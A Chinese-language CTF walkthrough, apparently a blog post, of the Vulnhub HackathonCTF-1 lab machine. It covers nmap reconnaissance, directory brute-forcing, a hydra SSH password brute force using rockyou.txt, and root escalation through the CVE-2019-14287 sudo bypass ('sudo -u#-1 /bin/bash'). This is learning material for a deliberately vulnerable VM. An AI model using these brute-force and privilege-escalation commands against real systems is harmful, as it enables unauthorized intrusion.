Vulnhub靶场之HackathonCTF-1

Vulnhub靶场之HackathonCTF-1

靶场下载地址:http://www.vulnhub.com/entry/hackathonctf-1,591/
本机kali地址:192.168.157.144

信息收集

第一步都是nmap扫描

nmap -sP 192.168.157.144/24

在这里插入图片描述
真实机是.2,目标主机是.157
接下来扫描端口和详细信息

nmap -A 192.168.157.157 -p-

在这里插入图片描述
可以看到目标主机开放了21,23,80,7223端口
用浏览器访问80端口看看
在这里插入图片描述
这not found可太秀了,打开robots.txt看看
在这里插入图片描述
这里显示了3个路径,但这三个路径进去显示的是404,下面那个是base64编码后的字符串,我们去解码看看

c3NoLWJydXRlZm9yY2Utc3Vkb2l0Cg==
//解码后
ssh-bruteforce-sudoit

暴力破解ssh?字典去哪整呢?这一句话给我干懵逼了,没事,慢慢来,扫描一下网页目录
这里我使用bp去爆破
用bp抓包后发送到intruder,将index.html设置为变量
在这里插入图片描述
在payload那块地方选择好字典,options那里设置好线程就可以开始爆破了
在这里插入图片描述
在这里插入图片描述
这里发现sudo.html和ftc.html可以访问,赶紧看看去
先看看sudo.html页面
在这里插入图片描述
在源码那里发现了一条关键信息

#uname : test

再去看看ftc.html
在这里插入图片描述
f12发现有些被注释掉的信息,这里可以猜测到是ascii编码,我这里用python把这些ascii码转换成相应的字母或者符号

s = "#117#115#101#32#114#111#99#107#121#111#117#46#116#120#116"
//用split方法将字符串以#分隔开并将各个元素组成一个数组
s1 = s.split('#')
//删除掉第一个元素,因为第一个元素是空的
s1.pop(0)
for i in s1:
    print(chr(int(i)),end="")//end="" 为了不换行
运行结果
use rockyou.txt

爆破

现在确定了用户名和相应的密码字典,可以爆破ssh了!

hydra -l test -P /usr/share/wordlists/rockyou.txt ssh://192.168.157.157 -vV -f -s 7223

在这里插入图片描述

test:jordan23

建立连接

ssh test@192.168.157.157 -p 7223
test@192.168.157.157's password: 
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)

 * Documentation:  https://help.ubuntu.com/
New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Nov 27 05:23:48 2020 from 192.168.157.144
test@ctf:~$ 

提权

去了家目录逛了一圈发现有两个文件夹,ctf和test,但里面没有什么有用的,sudo -l发现也没啥命令可以用

test@ctf:/home$ sudo -l
[sudo] password for test: 
Matching Defaults entries for test on ctf:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User test may run the following commands on ctf:
    (ALL, !root) ALL
test@ctf:/home$ 

这边看一下sudo的版本

test@ctf:/home$ sudo -V
Sudo version 1.8.9p5
Sudoers policy plugin version 1.8.9p5
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.9p5
test@ctf:/home$ 

版本有点低,其实这个版本有一个关于sudo提权的漏洞是可以使用的

CVE-2019-14287

该漏洞对1.8.28以下的版本都有用,这里我就不详细说明该漏洞了,感兴趣的同学可以去这里看看这个链接:https://baijiahao.baidu.com/s?id=1647429741181134559&wfr=spider&for=pc
接下来直接利用该漏洞就可以成功提权了

test@ctf:/home$ sudo -u#-1 id -u
0
test@ctf:/home$ sudo -u#-1 /bin/bash
root@ctf:/home# 

总结

这次靶机也是比较简单的,关键点就是爆破和字典的选择,其次是对于CVE-2019-14287这个漏洞是否了解,老实说,我第一次做的时候在爆破网站目录的时候卡了很久,因为字典里没有那几个关键的目录,而且没想到robots.txt就提示了一些目录信息。
感觉爆破这个东西挺看脸的,可能是我比较菜吧。
新人发帖,希望大家多多包含,如果大家发现我某些地方讲解有误或者不严谨,请告诉我,我将感激不尽

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值